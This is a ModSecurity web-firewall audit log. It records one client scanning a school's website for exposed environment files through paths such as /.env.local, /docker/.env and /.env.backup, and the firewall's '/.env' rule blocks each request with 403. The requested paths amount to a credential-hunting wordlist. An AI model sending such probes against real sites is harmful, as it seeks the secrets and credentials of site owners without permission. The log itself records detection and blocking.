Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83c86872-Z-- --a011174d-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqQAAAAo 103.236.140.4 38384 103.236.140.4 8181 --a011174d-B-- GET /.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a011174d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a011174d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905204711 740 (- - -) Stopwatch2: 1745151905204711 740; combined=315, p1=265, p2=0, p3=0, p4=0, p5=50, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a011174d-Z-- --4e177b7c-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqgAAAAs 103.236.140.4 38386 103.236.140.4 8181 --4e177b7c-B-- GET /script/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4e177b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e177b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905274743 808 (- - -) Stopwatch2: 1745151905274743 808; combined=312, p1=268, p2=0, p3=0, p4=0, p5=44, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e177b7c-Z-- --21f7d77c-A-- [20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-SgAAAJE 103.236.140.4 38388 103.236.140.4 8181 --21f7d77c-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --21f7d77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21f7d77c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905345913 787 (- - -) Stopwatch2: 1745151905345913 787; combined=317, p1=282, p2=0, p3=0, p4=0, p5=34, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21f7d77c-Z-- --83a05a54-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NqwAAAAE 103.236.140.4 38390 103.236.140.4 8181 --83a05a54-B-- GET /.env.prod HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --83a05a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83a05a54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905415991 726 (- - -) Stopwatch2: 1745151905415991 726; combined=260, p1=216, p2=0, p3=0, p4=0, p5=44, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83a05a54-Z-- --36c76101-A-- [20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-SwAAAJQ 103.236.140.4 38392 103.236.140.4 8181 --36c76101-B-- GET /storage/.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --36c76101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c76101-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905490210 680 (- - -) Stopwatch2: 1745151905490210 680; combined=281, p1=250, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c76101-Z-- --8335fe0c-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NrAAAABQ 103.236.140.4 38394 103.236.140.4 8181 --8335fe0c-B-- GET /enviroments/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8335fe0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8335fe0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905559649 750 (- - -) Stopwatch2: 1745151905559649 750; combined=303, p1=261, p2=0, p3=0, p4=0, p5=42, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8335fe0c-Z-- --6fce6a4f-A-- [20/Apr/2025:19:25:05 +0700] aATnoVu16wJWB6g0mU8NrQAAAAQ 103.236.140.4 38396 103.236.140.4 8181 --6fce6a4f-B-- GET /application/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6fce6a4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fce6a4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905630209 756 (- - -) Stopwatch2: 1745151905630209 756; combined=327, p1=294, p2=0, p3=0, p4=0, p5=33, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fce6a4f-Z-- --49dc2d18-A-- [20/Apr/2025:19:25:05 +0700] aATnocTCDeBrh52UaHS-TAAAAI0 103.236.140.4 38402 103.236.140.4 8181 --49dc2d18-B-- GET /icons/.env/.env.development HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --49dc2d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49dc2d18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905700857 691 (- - -) Stopwatch2: 1745151905700857 691; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49dc2d18-Z-- --979fe60c-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5QAAAMY 103.236.140.4 38404 103.236.140.4 8181 --979fe60c-B-- GET /.env.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --979fe60c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --979fe60c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905771163 857 (- - -) Stopwatch2: 1745151905771163 857; combined=338, p1=290, p2=0, p3=0, p4=0, p5=48, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --979fe60c-Z-- --d0c0865a-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5gAAAMc 103.236.140.4 38406 103.236.140.4 8181 --d0c0865a-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d0c0865a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0c0865a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905841660 805 (- - -) Stopwatch2: 1745151905841660 805; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0c0865a-Z-- --4f36eb72-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5wAAAMU 103.236.140.4 38408 103.236.140.4 8181 --4f36eb72-B-- GET /back/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4f36eb72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f36eb72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905913190 540 (- - -) Stopwatch2: 1745151905913190 540; combined=208, p1=181, p2=0, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f36eb72-Z-- --6972c744-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr6AAAAM0 103.236.140.4 38410 103.236.140.4 8181 --6972c744-B-- GET /download/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6972c744-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6972c744-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905983496 616 (- - -) Stopwatch2: 1745151905983496 616; combined=238, p1=212, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6972c744-Z-- --d672054a-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6QAAAMk 103.236.140.4 38412 103.236.140.4 8181 --d672054a-B-- GET /docker/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d672054a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d672054a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906053268 707 (- - -) Stopwatch2: 1745151906053268 707; combined=253, p1=215, p2=0, p3=0, p4=0, p5=37, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d672054a-Z-- --42db4724-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6gAAAME 103.236.140.4 38414 103.236.140.4 8181 --42db4724-B-- GET /cms/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --42db4724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42db4724-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906123183 690 (- - -) Stopwatch2: 1745151906123183 690; combined=275, p1=247, p2=0, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42db4724-Z-- --6486987e-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TQAAAIc 103.236.140.4 38416 103.236.140.4 8181 --6486987e-B-- GET /content/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6486987e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6486987e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906193753 785 (- - -) Stopwatch2: 1745151906193753 785; combined=316, p1=282, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6486987e-Z-- --8ed5dc2a-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TgAAAIg 103.236.140.4 38418 103.236.140.4 8181 --8ed5dc2a-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8ed5dc2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed5dc2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906264421 677 (- - -) Stopwatch2: 1745151906264421 677; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed5dc2a-Z-- --ef4c7500-A-- [20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3QAAAEQ 103.236.140.4 38420 103.236.140.4 8181 --ef4c7500-B-- GET /user/.env.staging HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ef4c7500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef4c7500-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906334739 712 (- - -) Stopwatch2: 1745151906334739 712; combined=273, p1=237, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef4c7500-Z-- --59c75770-A-- [20/Apr/2025:19:25:06 +0700] aATnolu16wJWB6g0mU8NrwAAABY 103.236.140.4 38422 103.236.140.4 8181 --59c75770-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --59c75770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59c75770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906411311 681 (- - -) Stopwatch2: 1745151906411311 681; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59c75770-Z-- --2eda176d-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TwAAAJY 103.236.140.4 38424 103.236.140.4 8181 --2eda176d-B-- GET /files/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --2eda176d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eda176d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906481951 644 (- - -) Stopwatch2: 1745151906481951 644; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
